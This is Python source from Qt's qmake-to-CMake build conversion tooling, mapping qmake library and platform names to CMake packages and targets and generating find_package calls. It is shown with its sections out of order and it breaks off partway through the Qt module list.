LibraryMapping("jpeg", "JPEG", "JPEG::JPEG"), # see also libjpeg
LibraryMapping("libatomic", "WrapAtomic", "WrapAtomic::WrapAtomic"),
LibraryMapping("libb2", "Libb2", "PkgConfig::Libb2"),
LibraryMapping("libclang", "WrapLibClang", "WrapLibClang::WrapLibClang"),
LibraryMapping("libdl", None, "${CMAKE_DL_LIBS}"),
LibraryMapping("libinput", "Libinput", "Libinput::Libinput"),
LibraryMapping("libjpeg", "JPEG", "JPEG::JPEG"), # see also jpeg
LibraryMapping("libpng", "WrapPNG", "WrapPNG::WrapPNG", is_bundled_with_qt=True),
LibraryMapping("libproxy", "Libproxy", "PkgConfig::Libproxy"),
LibraryMapping("librt", "WrapRt", "WrapRt::WrapRt"),
LibraryMapping("libudev", "Libudev", "PkgConfig::Libudev"),
LibraryMapping("lttng-ust", "LTTngUST", "LTTng::UST", resultVariable="LTTNGUST"),
LibraryMapping("mtdev", "Mtdev", "PkgConfig::Mtdev"),
LibraryMapping("mysql", "MySQL", "MySQL::MySQL"),
LibraryMapping("odbc", "ODBC", "ODBC::ODBC"),
LibraryMapping("opengl_es2", "GLESv2", "GLESv2::GLESv2"),
LibraryMapping("opengl", "WrapOpenGL", "WrapOpenGL::WrapOpenGL", resultVariable="WrapOpenGL"),
LibraryMapping(
"openssl_headers",
"WrapOpenSSLHeaders",
"WrapOpenSSLHeaders::WrapOpenSSLHeaders",
resultVariable="TEST_openssl_headers",
appendFoundSuffix=False,
test_library_overwrite="WrapOpenSSLHeaders::WrapOpenSSLHeaders",
run_library_test=True,
),
LibraryMapping(
"openssl",
"WrapOpenSSL",
"WrapOpenSSL::WrapOpenSSL",
resultVariable="TEST_openssl",
appendFoundSuffix=False,
run_library_test=True,
no_link_so_name="openssl_headers",
),
LibraryMapping("oci", "Oracle", "Oracle::OCI"),
LibraryMapping(
"pcre2",
"WrapPCRE2",
"WrapPCRE2::WrapPCRE2",
extra=["10.20", "REQUIRED"],
is_bundled_with_qt=True,
),
LibraryMapping("pps", "PPS", "PPS::PPS"),
LibraryMapping("psql", "PostgreSQL", "PostgreSQL::PostgreSQL"),
LibraryMapping("slog2", "Slog2", "Slog2::Slog2"),
LibraryMapping("speechd", "SpeechDispatcher", "SpeechDispatcher::SpeechDispatcher"),
LibraryMapping("sqlite2", None, None), # No more sqlite2 support in Qt6!
LibraryMapping("sqlite3", "SQLite3", "SQLite::SQLite3"),
LibraryMapping("sqlite", "SQLite3", "SQLite::SQLite3"),
LibraryMapping("tslib", "Tslib", "PkgConfig::Tslib"),
LibraryMapping("udev", "Libudev", "PkgConfig::Libudev"),
LibraryMapping("udev", "Libudev", "PkgConfig::Libudev"), # see also libudev!
LibraryMapping("vulkan", "Vulkan", "Vulkan::Vulkan"),
LibraryMapping("wayland_server", "Wayland", "Wayland::Server"), # used in qtbase/src/gui
LibraryMapping("wayland-server", "Wayland", "Wayland::Server"), # used in qtwayland
LibraryMapping("wayland-client", "Wayland", "Wayland::Client"),
LibraryMapping("wayland-cursor", "Wayland", "Wayland::Cursor"),
LibraryMapping("wayland-egl", "Wayland", "Wayland::Egl"),
LibraryMapping(
"wayland-kms", "Waylandkms", "PkgConfig::Waylandkms"
), # TODO: check if this actually works
LibraryMapping("x11", "X11", "X11::X11"),
LibraryMapping("x11sm", "X11", "${X11_SM_LIB} ${X11_ICE_LIB}", resultVariable="X11_SM"),
LibraryMapping(
"xcb",
"XCB",
"XCB::XCB",
extra=["1.11"],
resultVariable="TARGET XCB::XCB",
appendFoundSuffix=False,
),
LibraryMapping(
"xcb_glx", "XCB", "XCB::GLX", extra=["COMPONENTS", "GLX"], resultVariable="XCB_GLX"
),
LibraryMapping(
"xcb_icccm",
"XCB",
"XCB::ICCCM",
extra=["0.3.9", "COMPONENTS", "ICCCM"],
resultVariable="XCB_ICCCM",
),
LibraryMapping(
"xcb_image",
"XCB",
"XCB::IMAGE",
extra=["0.3.9", "COMPONENTS", "IMAGE"],
resultVariable="XCB_IMAGE",
),
LibraryMapping(
"xcb_keysyms",
"XCB",
"XCB::KEYSYMS",
extra=["0.3.9", "COMPONENTS", "KEYSYMS"],
resultVariable="XCB_KEYSYMS",
),
LibraryMapping(
"xcb_randr", "XCB", "XCB::RANDR", extra=["COMPONENTS", "RANDR"], resultVariable="XCB_RANDR"
),
LibraryMapping(
"xcb_render",
"XCB",
"XCB::RENDER",
extra=["COMPONENTS", "RENDER"],
resultVariable="XCB_RENDER",
),
LibraryMapping(
"xcb_renderutil",
"XCB",
"XCB::RENDERUTIL",
extra=["0.3.9", "COMPONENTS", "RENDERUTIL"],
resultVariable="XCB_RENDERUTIL",
),
LibraryMapping(
"xcb_shape", "XCB", "XCB::SHAPE", extra=["COMPONENTS", "SHAPE"], resultVariable="XCB_SHAPE"
),
LibraryMapping(
"xcb_shm", "XCB", "XCB::SHM", extra=["COMPONENTS", "SHM"], resultVariable="XCB_SHM"
),
LibraryMapping(
"xcb_sync", "XCB", "XCB::SYNC", extra=["COMPONENTS", "SYNC"], resultVariable="XCB_SYNC"
),
LibraryMapping(
"xcb_xfixes",
"XCB",
"XCB::XFIXES",
extra=["COMPONENTS", "XFIXES"],
resultVariable="XCB_XFIXES",
),
LibraryMapping(
"xcb-xfixes",
"XCB",
"XCB::XFIXES",
extra=["COMPONENTS", "XFIXES"],
resultVariable="XCB_XFIXES",
),
LibraryMapping(
"xcb_xinput",
"XCB",
"XCB::XINPUT",
extra=["1.12", "COMPONENTS", "XINPUT"],
resultVariable="XCB_XINPUT",
),
LibraryMapping(
"xcb_xkb", "XCB", "XCB::XKB", extra=["COMPONENTS", "XKB"], resultVariable="XCB_XKB"
),
LibraryMapping("xcb_xlib", "X11_XCB", "X11::XCB"),
LibraryMapping("xcomposite", "XComposite", "PkgConfig::XComposite"),
LibraryMapping("xkbcommon_evdev", "XKB", "XKB::XKB", extra=["0.5.0"]), # see also xkbcommon
LibraryMapping("xkbcommon_x11", "XKB_COMMON_X11", "PkgConfig::XKB_COMMON_X11", extra=["0.5.0"]),
LibraryMapping("xkbcommon", "XKB", "XKB::XKB", extra=["0.5.0"]),
LibraryMapping("xlib", "X11", "X11::X11"),
LibraryMapping("xrender", "XRender", "PkgConfig::XRender", extra=["0.6"]),
LibraryMapping("zlib", "ZLIB", "ZLIB::ZLIB", extra=["1.0.8"]),
LibraryMapping("zstd", "ZSTD", "ZSTD::ZSTD", extra=["1.3"]),
LibraryMapping("tiff", "TIFF", "TIFF::TIFF"),
LibraryMapping("webp", "WrapWebP", "WrapWebP::WrapWebP"),
LibraryMapping("jasper", "WrapJasper", "WrapJasper::WrapJasper"),
LibraryMapping("sdl2", "WrapSDL2", "WrapSDL2::WrapSDL2"),
LibraryMapping("hunspell", "Hunspell", "Hunspell::Hunspell"),
LibraryMapping(
"qt3d-assimp",
"WrapQt3DAssimp",
"WrapQt3DAssimp::WrapQt3DAssimp",
extra=["5"],
run_library_test=True,
resultVariable="TEST_assimp",
appendFoundSuffix=False,
),
LibraryMapping(
"quick3d_assimp",
"WrapQuick3DAssimp",
"WrapQuick3DAssimp::WrapQuick3DAssimp",
extra=["5"],
run_library_test=True,
resultVariable="TEST_quick3d_assimp",
appendFoundSuffix=False,
),
]
def _adjust_library_map():
# Assign a Linux condition on all x and wayland related packages.
# We don't want to get pages of package not found messages on
# Windows and macOS, and this also improves configure time on
# those platforms.
linux_package_prefixes = ["xcb", "x11", "xkb", "xrender", "xlib", "wayland"]
for i, _ in enumerate(_library_map):
if any([_library_map[i].soName.startswith(p) for p in linux_package_prefixes]):
_library_map[i].emit_if = "config.linux"
_adjust_library_map()
def find_3rd_party_library_mapping(soName: str) -> typing.Optional[LibraryMapping]:
for i in _library_map:
if i.soName == soName:
return i
return None
def find_qt_library_mapping(soName: str) -> typing.Optional[LibraryMapping]:
for i in _qt_library_map:
if i.soName == soName:
return i
return None
def find_library_info_for_target(targetName: str) -> typing.Optional[LibraryMapping]:
qt_target = targetName
if targetName.endswith("Private"):
qt_target = qt_target[:-7]
for i in _qt_library_map:
if i.targetName == qt_target:
return i
for i in _library_map:
if i.targetName == targetName:
return i
return None
# For a given qmake library (e.g. 'openssl_headers'), check whether this is a fake library used
# for the /nolink annotation, and return the actual annotated qmake library ('openssl/nolink').
def find_annotated_qmake_lib_name(lib : str) -> str:
for entry in _library_map:
if entry.no_link_so_name == lib:
return entry.soName + "/nolink"
return lib
def featureName(name: str) -> str:
replacement_char = "_"
if name.startswith("c++"):
replacement_char = "x"
return re.sub(r"[^a-zA-Z0-9_]", replacement_char, name)
def map_qt_library(lib: str) -> str:
private = False
if lib.endswith("-private"):
private = True
lib = lib[:-8]
mapped = find_qt_library_mapping(lib)
qt_name = lib
if mapped:
assert mapped.targetName # Qt libs must have a target name set
qt_name = mapped.targetName
if private:
qt_name += "Private"
return qt_name
platform_mapping = {
"win32": "WIN32",
"win": "WIN32",
"unix": "UNIX",
"darwin": "APPLE",
"linux": "LINUX",
"integrity": "INTEGRITY",
"qnx": "QNX",
"vxworks": "VXWORKS",
"hpux": "HPUX",
"nacl": "NACL",
"android": "ANDROID",
"android-embedded": "ANDROID_EMBEDDED",
"uikit": "UIKIT",
"tvos": "TVOS",
"watchos": "WATCHOS",
"winrt": "WINRT",
"wasm": "WASM",
"emscripten": "EMSCRIPTEN",
"msvc": "MSVC",
"clang": "CLANG",
"gcc": "GCC",
"icc": "ICC",
"intel_icc": "ICC",
"osx": "MACOS",
"ios": "IOS",
"freebsd": "FREEBSD",
"openbsd": "OPENBSD",
"mingw": "MINGW",
"netbsd": "NETBSD",
"haiku": "HAIKU",
"mac": "APPLE",
"macx": "MACOS",
"macos": "MACOS",
"macx-icc": "(MACOS AND ICC)",
}
def map_platform(platform: str) -> str:
""" Return the qmake platform as cmake platform or the unchanged string. """
return platform_mapping.get(platform, platform)
def is_known_3rd_party_library(lib: str) -> bool:
handling_no_link = False
if lib.endswith("/nolink") or lib.endswith("_nolink"):
lib = lib[:-7]
handling_no_link = True
mapping = find_3rd_party_library_mapping(lib)
if handling_no_link and mapping and mapping.no_link_so_name:
no_link_mapping = find_3rd_party_library_mapping(mapping.no_link_so_name)
if no_link_mapping:
mapping = no_link_mapping
return mapping is not None
def map_3rd_party_library(lib: str) -> str:
handling_no_link = False
libpostfix = ""
if lib.endswith("/nolink"):
lib = lib[:-7]
libpostfix = "_nolink"
handling_no_link = True
mapping = find_3rd_party_library_mapping(lib)
if handling_no_link and mapping and mapping.no_link_so_name:
no_link_mapping = find_3rd_party_library_mapping(mapping.no_link_so_name)
if no_link_mapping:
mapping = no_link_mapping
libpostfix = ""
if not mapping or not mapping.targetName:
return lib
return mapping.targetName + libpostfix
compile_test_dependent_library_mapping = {
"dtls": {"openssl": "openssl_headers"},
"ocsp": {"openssl": "openssl_headers"},
}
def get_compile_test_dependent_library_mapping(compile_test_name: str, dependency_name: str):
if compile_test_name in compile_test_dependent_library_mapping:
mapping = compile_test_dependent_library_mapping[compile_test_name]
if dependency_name in mapping:
return mapping[dependency_name]
return dependency_name
def generate_find_package_info(
lib: LibraryMapping,
use_qt_find_package: bool = True,
*,
indent: int = 0,
emit_if: str = "",
use_system_package_name: bool = False,
module: str = "",
) -> str:
isRequired = False
extra = lib.extra.copy()
if "REQUIRED" in extra and use_qt_find_package:
isRequired = True
extra.remove("REQUIRED")
cmake_target_name = lib.targetName
assert cmake_target_name
# _nolink or not does not matter at this point:
if cmake_target_name.endswith("_nolink") or cmake_target_name.endswith("/nolink"):
cmake_target_name = cmake_target_name[:-7]
initial_package_name: str = lib.packageName if lib.packageName else ""
package_name: str = initial_package_name
if use_system_package_name:
replace_args = ["Wrap", "WrapSystem"]
package_name = package_name.replace(*replace_args) # type: ignore
cmake_target_name = cmake_target_name.replace(*replace_args) # type: ignore
if use_qt_find_package:
if cmake_target_name:
extra += ["PROVIDED_TARGETS", cmake_target_name]
if module:
extra += ["MODULE_NAME", module]
extra += ["QMAKE_LIB", find_annotated_qmake_lib_name(lib.soName)]
result = ""
one_ind = " "
ind = one_ind * indent
if use_qt_find_package:
if extra:
result = f"{ind}qt_find_package({package_name} {" ".join(extra)})\n"
else:
result = f"{ind}qt_find_package({package_name})\n"
if isRequired:
result += (
f"{ind}set_package_properties({initial_package_name} PROPERTIES TYPE REQUIRED)\n"
)
else:
if extra:
result = f"{ind}find_package({package_name} {" ".join(extra)})\n"
else:
result = f"{ind}find_package({package_name})\n"
# If a package should be found only in certain conditions, wrap
# the find_package call within that condition.
if emit_if:
result = f"if(({emit_if}) OR QT_FIND_ALL_PACKAGES_ALWAYS)\n{one_ind}{result}endif()\n"
return result
def _set_up_py_parsing_nicer_debug_output(pp):
indent = -1
def increase_indent(fn):
def wrapper_function(*args):
nonlocal indent
indent += 1
print("> " * indent, end="")
return fn(*args)
return wrapper_function
def decrease_indent(fn):
def wrapper_function(*args):
nonlocal indent
print("> " * indent, end="")
indent -= 1
return fn(*args)
return wrapper_function
pp._defaultStartDebugAction = increase_indent(pp._defaultStartDebugAction)
pp._defaultSuccessDebugAction = decrease_indent(pp._defaultSuccessDebugAction)
pp._defaultExceptionDebugAction = decrease_indent(pp._defaultExceptionDebugAction)
| #############################################################################
##
## Copyright (C) 2018 The Qt Company Ltd.
## Contact: https://www.qt.io/licensing/
##
## This file is part of the plugins of the Qt Toolkit.
##
## $QT_BEGIN_LICENSE:GPL-EXCEPT$
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms
## and conditions see https://www.qt.io/terms-conditions. For further
## information use the contact form at https://www.qt.io/contact-us.
##
## GNU General Public License Usage
## Alternatively, this file may be used under the terms of the GNU
## General Public License version 3 as published by the Free Software
## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
## included in the packaging of this file. Please review the following
## information to ensure the GNU General Public License requirements will
## be met: https://www.gnu.org/licenses/gpl-3.0.html.
##
## $QT_END_LICENSE$
##
#############################################################################
import re
import typing
class LibraryMapping:
def __init__(
self,
soName: str,
packageName: typing.Optional[str],
targetName: typing.Optional[str],
*,
resultVariable: typing.Optional[str] = None,
extra: typing.List[str] = [],
appendFoundSuffix: bool = True,
emit_if: str = "",
is_bundled_with_qt: bool = False,
test_library_overwrite: str = "",
run_library_test: bool = False,
no_link_so_name: str = "",
) -> None:
self.soName = soName
self.packageName = packageName
self.resultVariable = resultVariable
self.appendFoundSuffix = appendFoundSuffix
# Allows passing addiitonal arguments to the generated find_package call.
self.extra = extra
self.targetName = targetName
# True if qt bundles the library sources as part of Qt.
self.is_bundled_with_qt = is_bundled_with_qt
# if emit_if is non-empty, the generated find_package call
# for a library will be surrounded by this condition.
self.emit_if = emit_if
# Allow overwriting library name when used with tests. E.g.: _nolink
# targets do not exist when used during compile tests
self.test_library_overwrite = test_library_overwrite
# Run the library compile test of configure.json
self.run_library_test = run_library_test
# The custom nolink library mapping associated with this one.
self.no_link_so_name = no_link_so_name
def is_qt(self) -> bool:
return self.packageName == "Qt" or self.packageName == "Qt5" or self.packageName == "Qt6"
_qt_library_map = [
# Qt:
LibraryMapping(
"androidextras", "Qt6", "Qt::AndroidExtras", extra=["COMPONENTS", "AndroidExtras"]
),
LibraryMapping("3danimation", "Qt6", "Qt::3DAnimation", extra=["COMPONENTS", "3DAnimation"]),
LibraryMapping("3dcore", "Qt6", "Qt::3DCore", extra=["COMPONENTS", "3DCore"]),
LibraryMapping("3dcoretest", "Qt6", "Qt::3DCoreTest", extra=["COMPONENTS", "3DCoreTest"]),
LibraryMapping("3dextras", "Qt6", "Qt::3DExtras", extra=["COMPONENTS", "3DExtras"]),
LibraryMapping("3dinput", "Qt6", "Qt::3DInput", extra=["COMPONENTS", "3DInput"]),
LibraryMapping("3dlogic", "Qt6", "Qt::3DLogic", extra=["COMPONENTS", "3DLogic"]),
LibraryMapping("3dquick", "Qt6", "Qt::3DQuick", extra=["COMPONENTS", "3DQuick"]),
LibraryMapping(
"3dquickextras", "Qt6", "Qt::3DQuickExtras", extra=["COMPONENTS", "3DQuickExtras"]
),
LibraryMapping("3dquickinput", "Qt6", "Qt::3DQuickInput", extra=["COMPONENTS", "3DQuickInput"]),
LibraryMapping(
"3dquickrender", "Qt6", "Qt::3DQuickRender", extra=["COMPONENTS", "3DQuickRender"]
),
LibraryMapping("3drender", "Qt6", "Qt::3DRender", extra=["COMPONENTS", "3DRender"]),
LibraryMapping(
"application-lib", "Qt6", "Qt::AppManApplication", extra=["COMPONENTS", "AppManApplication"]
),
LibraryMapping("axbase", "Qt6", "Qt::AxBase", extra=["COMPONENTS", "AxBase"]),
LibraryMapping("axcontainer", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
LibraryMapping("axserver", "Qt6", "Qt::AxServer", extra=["COMPONENTS", "AxServer"]),
LibraryMapping("bluetooth", "Qt6", "Qt::Bluetooth", extra=["COMPONENTS", "Bluetooth"]),
LibraryMapping("bootstrap", "Qt6", "Qt::Bootstrap", extra=["COMPONENTS", "Bootstrap"]),
# bootstrap-dbus: Not needed in Qt6!
LibraryMapping("client", "Qt6", "Qt::WaylandClient", extra=["COMPONENTS", "WaylandClient"]),
LibraryMapping("coap", "Qt6", "Qt::Coap", extra=["COMPONENTS", "Coap"]),
LibraryMapping("common-lib", "Qt6", "Qt::AppManCommon", extra=["COMPONENTS", "AppManCommon"]),
LibraryMapping(
"compositor", "Qt6", "Qt::WaylandCompositor", extra=["COMPONENTS", "WaylandCompositor"]
),
LibraryMapping("concurrent", "Qt6", "Qt::Concurrent", extra=["COMPONENTS", "Concurrent"]),
LibraryMapping("container", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
LibraryMapping("control", "Qt6", "Qt::AxServer", extra=["COMPONENTS", "AxServer"]),
LibraryMapping(
"core_headers", "Qt6", "Qt::WebEngineCore", extra=["COMPONENTS", "WebEngineCore"]
),
LibraryMapping("core", "Qt6", "Qt::Core", extra=["COMPONENTS", "Core"]),
LibraryMapping("crypto-lib", "Qt6", "Qt::AppManCrypto", extra=["COMPONENTS", "AppManCrypto"]),
LibraryMapping("dbus", "Qt6", "Qt::DBus", extra=["COMPONENTS", "DBus"]),
LibraryMapping("designer", "Qt6", "Qt::Designer", extra=["COMPONENTS", "Designer"]),
LibraryMapping(
"designercomponents",
"Qt6",
"Qt::DesignerComponents",
extra=["COMPONENTS", "DesignerComponents"],
),
LibraryMapping(
"devicediscovery",
"Qt6",
"Qt::DeviceDiscoverySupport",
extra=["COMPONENTS", "DeviceDiscoverySupport"],
),
LibraryMapping(
"devicediscovery_support",
"Qt6",
"Qt::DeviceDiscoverySupport",
extra=["COMPONENTS", "DeviceDiscoverySupport"],
),
LibraryMapping("edid", "Qt6", "Qt::EdidSupport", extra=["COMPONENTS", "EdidSupport"]),
LibraryMapping("edid_support", "Qt6", "Qt::EdidSupport", extra=["COMPONENTS", "EdidSupport"]),
LibraryMapping("eglconvenience", "Qt6", "Qt::EglSupport", extra=["COMPONENTS", "EglSupport"]),
LibraryMapping(
"eglfsdeviceintegration",
"Qt6",
"Qt::EglFSDeviceIntegration",
extra=["COMPONENTS", "EglFSDeviceIntegration"],
),
LibraryMapping(
"eglfs_kms_support", "Qt6", "Qt::EglFsKmsSupport", extra=["COMPONENTS", "EglFsKmsSupport"]
),
LibraryMapping(
"eglfs_kms_gbm_support",
"Qt6",
"Qt::EglFsKmsGbmSupport",
extra=["COMPONENTS", "EglFsKmsGbmSupport"],
),
LibraryMapping("egl_support", "Qt6", "Qt::EglSupport", extra=["COMPONENTS", "EglSupport"]),
# enginio: Not needed in Qt6!
LibraryMapping(
"eventdispatchers",
"Qt6",
"Qt::EventDispatcherSupport",
extra=["COMPONENTS", "EventDispatcherSupport"],
),
LibraryMapping(
"eventdispatcher_support",
"Qt6",
"Qt::EventDispatcherSupport",
extra=["COMPONENTS", "EventDispatcherSupport"],
),
LibraryMapping("fbconvenience", "Qt6", "Qt::FbSupport", extra=["COMPONENTS", "FbSupport"]),
LibraryMapping("fb_support", "Qt6", "Qt::FbSupport", extra=["COMPONENTS", "FbSupport"]),
LibraryMapping(
"fontdatabase_support",
"Qt6",
"Qt::FontDatabaseSupport",
extra=["COMPONENTS", "FontDatabaseSupport"],
),
LibraryMapping("gamepad", "Qt6", "Qt::Gamepad", extra=["COMPONENTS", "Gamepad"]),
LibraryMapping(
"global", "Qt6", "Qt::Core", extra=["COMPONENTS", "Core"]
), # manually added special case
LibraryMapping("glx_support", "Qt6", "Qt::GlxSupport", extra=["COMPONENTS", "GlxSupport"]),
LibraryMapping(
"gsttools", "Qt6", "Qt::MultimediaGstTools", extra=["COMPONENTS", "MultimediaGstTools"]
),
LibraryMapping("gui", "Qt6", "Qt::Gui", extra=["COMPONENTS", "Gui"]),
LibraryMapping("help", "Qt6", "Qt::Help", extra=["COMPONENTS", "Help"]),
LibraryMapping(
"hunspellinputmethod",
"Qt6",
"Qt::HunspellInputMethod",
extra=["COMPONENTS", "HunspellInputMethod"],
),
LibraryMapping("input", "Qt6", "Qt::InputSupport", extra=["COMPONENTS", "InputSupport"]),
LibraryMapping(
"input_support", "Qt6", "Qt::InputSupport", extra=["COMPONENTS", "InputSupport"]
),
LibraryMapping(
"installer-lib", "Qt6", "Qt::AppManInstaller", extra=["COMPONENTS", "AppManInstaller"]
),
LibraryMapping("knx", "Qt6", "Qt::Knx", extra=["COMPONENTS", "Knx"]),
LibraryMapping("kmsconvenience", "Qt6", "Qt::KmsSupport", extra=["COMPONENTS", "KmsSupport"]),
LibraryMapping("kms_support", "Qt6", "Qt::KmsSupport", extra=["COMPONENTS", "KmsSupport"]),
LibraryMapping(
"launcher-lib", "Qt6", "Qt::AppManLauncher", extra=["COMPONENTS", "AppManLauncher"]
),
LibraryMapping("lib", "Qt6", "Qt::Designer", extra=["COMPONENTS", "Designer"]),
LibraryMapping(
"linuxaccessibility_support",
"Qt6",
"Qt::LinuxAccessibilitySupport",
extra=["COMPONENTS", "LinuxAccessibilitySupport"],
),
LibraryMapping("location", "Qt6", "Qt::Location", extra=["COMPONENTS", "Location"]),
LibraryMapping("macextras", "Qt6", "Qt::MacExtras", extra=["COMPONENTS", "MacExtras"]),
LibraryMapping("main-lib", "Qt6", "Qt::AppManMain", extra=["COMPONENTS", "AppManMain"]),
LibraryMapping(
"manager-lib", "Qt6", "Qt::AppManManager", extra=["COMPONENTS", "AppManManager"]
),
LibraryMapping(
"monitor-lib", "Qt6", "Qt::AppManMonitor", extra=["COMPONENTS", "AppManMonitor"]
),
LibraryMapping("mqtt", "Qt6", "Qt::Mqtt", extra=["COMPONENTS", "Mqtt"]),
LibraryMapping("multimedia", "Qt6", "Qt::Multimedia", extra=["COMPONENTS", "Multimedia"]),
LibraryMapping(
"multimediawidgets",
"Qt6",
"Qt::MultimediaWidgets",
extra=["COMPONENTS", "MultimediaWidgets"],
),
LibraryMapping("network", "Qt6", "Qt::Network", extra=["COMPONENTS", "Network"]),
LibraryMapping("networkauth", "Qt6", "Qt::NetworkAuth", extra=["COMPONENTS", "NetworkAuth"]),
LibraryMapping("nfc", "Qt6", "Qt::Nfc", extra=["COMPONENTS", "Nfc"]),
LibraryMapping("oauth", "Qt6", "Qt::NetworkAuth", extra=["COMPONENTS", "NetworkAuth"]),
LibraryMapping("opcua", "Qt6", "Qt::OpcUa", extra=["COMPONENTS", "OpcUa"]),
LibraryMapping(
"opcua_private", "Qt6", "Qt::OpcUaPrivate", extra=["COMPONENTS", "OpcUaPrivate"]
),
LibraryMapping("opengl", "Qt6", "Qt::OpenGL", extra=["COMPONENTS", "OpenGL"]),
LibraryMapping(
"openglwidgets", "Qt6", "Qt::OpenGLWidgets", extra=["COMPONENTS", "OpenGLWidgets"]
),
LibraryMapping(
"package-lib", "Qt6", "Qt::AppManPackage", extra=["COMPONENTS", "AppManPackage"]
),
LibraryMapping(
"packetprotocol", "Qt6", "Qt::PacketProtocol", extra=["COMPONENTS", "PacketProtocol"]
),
LibraryMapping(
"particles", "Qt6", "Qt::QuickParticles", extra=["COMPONENTS", "QuickParticles"]
),
LibraryMapping(
"plugin-interfaces",
"Qt6",
"Qt::AppManPluginInterfaces",
extra=["COMPONENTS", "AppManPluginInterfaces"],
),
LibraryMapping("positioning", "Qt6", "Qt::Positioning", extra=["COMPONENTS", "Positioning"]),
LibraryMapping(
"positioningquick", "Qt6", "Qt::PositioningQuick", extra=["COMPONENTS", "PositioningQuick"]
),
LibraryMapping("printsupport", "Qt6", "Qt::PrintSupport", extra=["COMPONENTS", "PrintSupport"]),
LibraryMapping("purchasing", "Qt6", "Qt::Purchasing", extra=["COMPONENTS", "Purchasing"]),
LibraryMapping("qmldebug", "Qt6", "Qt::QmlDebug", extra=["COMPONENTS", "QmlDebug"]),
LibraryMapping("qmldevtools", "Qt6", "Qt::QmlDevTools", extra=["COMPONENTS", "QmlDevTools"]),
LibraryMapping("qmlcompiler", "Qt6", "Qt::QmlCompiler", extra=["COMPONENTS", "QmlCompiler"]),
LibraryMapping("qml", "Qt6", "Qt::Qml", extra=["COMPONENTS", "Qml"]),
LibraryMapping("qmldom", "Qt6", "Qt::QmlDom", extra=["COMPONENTS", "QmlDom"]),
LibraryMapping("qmlmodels", "Qt6", "Qt::QmlModels", extra=["COMPONENTS", "QmlModels"]),
LibraryMapping("qmltest", "Qt6", "Qt::QuickTest", extra=["COMPONENTS", "QuickTest"]),
LibraryMapping(
"qtmultimediaquicktools",
"Qt6",
"Qt::MultimediaQuick",
extra=["COMPONENTS", "MultimediaQuick"],
),
LibraryMapping(
"quick3dassetimport",
"Qt6",
"Qt::Quick3DAssetImport",
extra=["COMPONENTS", "Quick3DAssetImport"],
),
LibraryMapping("core5compat", "Qt6", "Qt::Core5Compat", extra=["COMPONENTS", "Core5Compat"]),
LibraryMapping("quick3d", "Qt6", "Qt::Quick3D", extra=["COMPONENTS", "Quick3D"]),
LibraryMapping(
"quick3drender", "Qt6", "Qt::Quick3DRender", extra=["COMPONENTS", "Quick3DRender"]
),
LibraryMapping(
"quick3druntimerender",
"Qt6",
"Qt::Quick3DRuntimeRender",
extra=["COMPONENTS", "Quick3DRuntimeRender"],
),
LibraryMapping("quick3dutils", "Qt6", "Qt::Quick3DUtils", extra=["COMPONENTS", "Quick3DUtils"]),
LibraryMapping(
"quickcontrols2", "Qt6", "Qt::QuickControls2", extra=["COMPONENTS", "QuickControls2"]
),
LibraryMapping(
"quickcontrols2impl",
"Qt6",
"Qt::QuickControls2Impl",
extra=["COMPONENTS", "QuickControls2Impl"],
),
LibraryMapping("quick", "Qt6", "Qt::Quick", extra=["COMPONENTS", "Quick"]),
LibraryMapping("quickshapes", "Qt6", "Qt::QuickShapes", extra=["COMPONENTS", "QuickShapes"]),
LibraryMapping(
"quicktemplates2", "Qt6", "Qt::QuickTemplates2", extra=["COMPONENTS", "QuickTemplates2"]
),
LibraryMapping("quickwidgets", "Qt6", "Qt::QuickWidgets", extra=["COMPONENTS", "QuickWidgets"]),
LibraryMapping(
"remoteobjects", "Qt6", "Qt::RemoteObjects", extra=["COMPONENTS", "RemoteObjects"]
),
LibraryMapping("script", "Qt6", "Qt::Script", extra=["COMPONENTS", "Script"]),
LibraryMapping("scripttools", "Qt6", "Qt::ScriptTools", extra=["COMPONENTS", "ScriptTools"]),
LibraryMapping("scxml", "Qt6", "Qt::Scxml", extra=["COMPONENTS", "Scxml"]),
LibraryMapping("sensors", "Qt6", "Qt::Sensors", extra=["COMPONENTS", "Sensors"]),
LibraryMapping("serialport", "Qt6", "Qt::SerialPort", extra=["COMPONENTS", "SerialPort"]),
LibraryMapping("serialbus", "Qt6", "Qt::SerialBus", extra=["COMPONENTS", "SerialBus"]),
LibraryMapping("services", "Qt6", "Qt::ServiceSupport", extra=["COMPONENTS", "ServiceSupport"]),
LibraryMapping(
"service_support", "Qt6", "Qt::ServiceSupport", extra=["COMPONENTS", "ServiceSupport"]
),
LibraryMapping("shadertools", "Qt6", "Qt::ShaderTools", extra=["COMPONENTS", "ShaderTools"]),
LibraryMapping("sql", "Qt6", "Qt::Sql", extra=["COMPONENTS", "Sql"]),
LibraryMapping("svg", "Qt6", "Qt::Svg", extra=["COMPONENTS", "Svg"]),
LibraryMapping("svgwidgets", "Qt6", "Qt::SvgWidgets", extra=["COMPONENTS", "SvgWidgets"]),
LibraryMapping("charts", "Qt6", "Qt::Charts", extra=["COMPONENTS", "Charts"]),
LibraryMapping("testlib", "Qt6", "Qt::Test", extra=["COMPONENTS", "Test"]),
LibraryMapping("texttospeech", "Qt6", "Qt::TextToSpeech", extra=["COMPONENTS", "TextToSpeech"]),
LibraryMapping(
"theme_support", "Qt6", "Qt::ThemeSupport", extra=["COMPONENTS", "ThemeSupport"]
),
LibraryMapping("tts", "Qt6", "Qt::TextToSpeech", extra=["COMPONENTS", "TextToSpeech"]),
LibraryMapping("uiplugin", "Qt6", "Qt::UiPlugin", extra=["COMPONENTS", "UiPlugin"]),
LibraryMapping("uitools", "Qt6", "Qt::UiTools", extra=["COMPONENTS", "UiTools"]),
LibraryMapping(
"virtualkeyboard", "Qt6", "Qt::VirtualKeyboard", extra=["COMPONENTS", "VirtualKeyboard"]
),
LibraryMapping(
"waylandclient", "Qt6", "Qt::WaylandClient", extra=["COMPONENTS", "WaylandClient"]
),
LibraryMapping(
"waylandcompositor",
"Qt6",
"Qt::WaylandCompositor",
extra=["COMPONENTS", "WaylandCompositor"],
),
LibraryMapping("webchannel", "Qt6", "Qt::WebChannel", extra=["COMPONENTS", "WebChannel"]),
LibraryMapping("webengine", "Qt6", "Qt::WebEngine", extra=["COMPONENTS", "WebEngine"]),
LibraryMapping(
